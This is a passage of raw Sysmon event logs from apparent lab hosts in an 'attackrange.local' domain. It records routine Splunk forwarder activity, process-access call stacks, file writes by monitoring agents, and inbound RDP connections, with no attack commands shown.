Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978983Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.936{69CF5F33-8AFC-6151-CC79-00000000FD01}1064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978982Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.279{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9A2AE984E8EB7FCBD9C987F436692E0,SHA256=FDA818BF0B3B81B9F3F69201B6285AB1A0175B1622AEE9C87DF24D3CF4B66FF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978981Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.279{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12FD8CCBC81AC12F66C880D6922F9422,SHA256=8E7631C64E63FCE70D2C61CA82BCD667B14CF87879383209EBD726512290861B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978980Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.279{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8AFC-6151-CB79-00000000FD01}412C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978979Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.263{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978978Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.263{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978977Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.263{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978976Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.263{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978975Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.263{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978974Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.263{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978973Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.263{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978972Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.263{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978971Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.263{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978970Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.263{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8AFC-6151-CB79-00000000FD01}412C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978969Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.263{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8AFC-6151-CB79-00000000FD01}412C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978968Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.249{69CF5F33-8AFC-6151-CB79-00000000FD01}412C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978998Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:29.420{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC76CEBE7BA0B5C6670987C2AD2C7058,SHA256=4F0927FBD058602CBCA971EDCA68F01DB86E4669D423D10EA6636F121D6849AC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050296Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:28.255{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58292-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050295Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:29.407{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F773BEAEE9F5325A2F8A87FF4346A559,SHA256=2D0DEAE816A80E8D79A25D98FC79D73DF46F29EFE4D7BF7CB4BDD55B9ED7CB5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978997Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:29.279{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08CDA80D59F9546598EE651D612FD2CF,SHA256=3E570813B94ABBBB05461971D2AF3B6854A81B7CDA3859E2395E30A93FAB1073,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978996Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:29.091{69CF5F33-8AFC-6151-CC79-00000000FD01}10643596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000978999Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:30.451{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6F03537197BDF13F2825D6840D1F86C,SHA256=CEB1F84D190F3F7F952201C1DF133ED5FAF11D77EEE8A173F4F08A750A04B916,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050298Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:30.438{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B27206E1E9EE782473F17F08BDE89E03,SHA256=E6DD56C3C2B6FD17DA7E8BC64F7EBBE239B4541E7C28B7FF4727BB715B76310E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050297Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:30.107{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=032ADE305CB9C3581B61FA68C5F754DE,SHA256=09236AF098E22D60783A9FEAA49C04E64D0B1560F318A9CF528511246010A0B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979003Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:31.638{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8050C05C480F742A41EB6461B94AFB0,SHA256=896FF0C940A8B51383A0797E7186AE6853394111E716A7F1E0E54AF87826366F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979002Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.444{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54558-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979001Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.672{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse110.10.193.201-53959-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001050299Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:31.438{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB8A3804F7312F6B342FED865C964B04,SHA256=8EE7E099E4BBFEA2AB05048798B264BE5976EC063E4EC70F8D646C33EA5F1FF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979000Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:31.138{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B3C20D16F01D5678AE16A6538595C8FE,SHA256=C1996E09F5AC3EA9B859DA65CA9D06774A53D2201407C76848A4ACACF38A3D3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979006Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:32.779{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E14E3AE7796FFBE85B916B482CC5F1A3,SHA256=D319B067BC1D07E3B78691534A2EFF7E78D24A9A9A77C385C36CA58D104E1A01,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050302Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:30.799{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53375-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050301Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:32.469{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E35DD1D55D796F894CBFFC0029D3D0CD,SHA256=0A7F2D5DB3AA7E5CDF4677F09829D5CAD4AE216B378396D669692596283BE225,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979005Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:32.638{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4149A22F01E8FA2002E2C892574C90A7,SHA256=9F55B8EBA6E1C01E94C44FB28B70A8821E43F4EB1F5B91AEDD0FA8EED302EB07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979004Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:32.545{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=2D63F63576DDF94AC8EF59A00C65FDDE,SHA256=01CD18CFC800D70CF7E2E6ACD02145899EE74C16760E347911228AA5E15EE65F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050300Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:32.308{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4308MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979008Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:33.951{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDB9B2D2FB85FAEC225E955685C16062,SHA256=C56C908F10091CB99BB70AEAD21AC2EBD6DEB8B5DCC5621130A1481388BF1899,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050304Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:33.469{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE078F49E6A756779D0356273382FD47,SHA256=E4791138DAC7CDA9C4A10ED94C5C0B465A1F9C6F9DD272ACDDA40FC682FB9E40,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979007Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:29.890{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59393-false10.0.1.12-8000- 23542300x80000000000000001050303Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 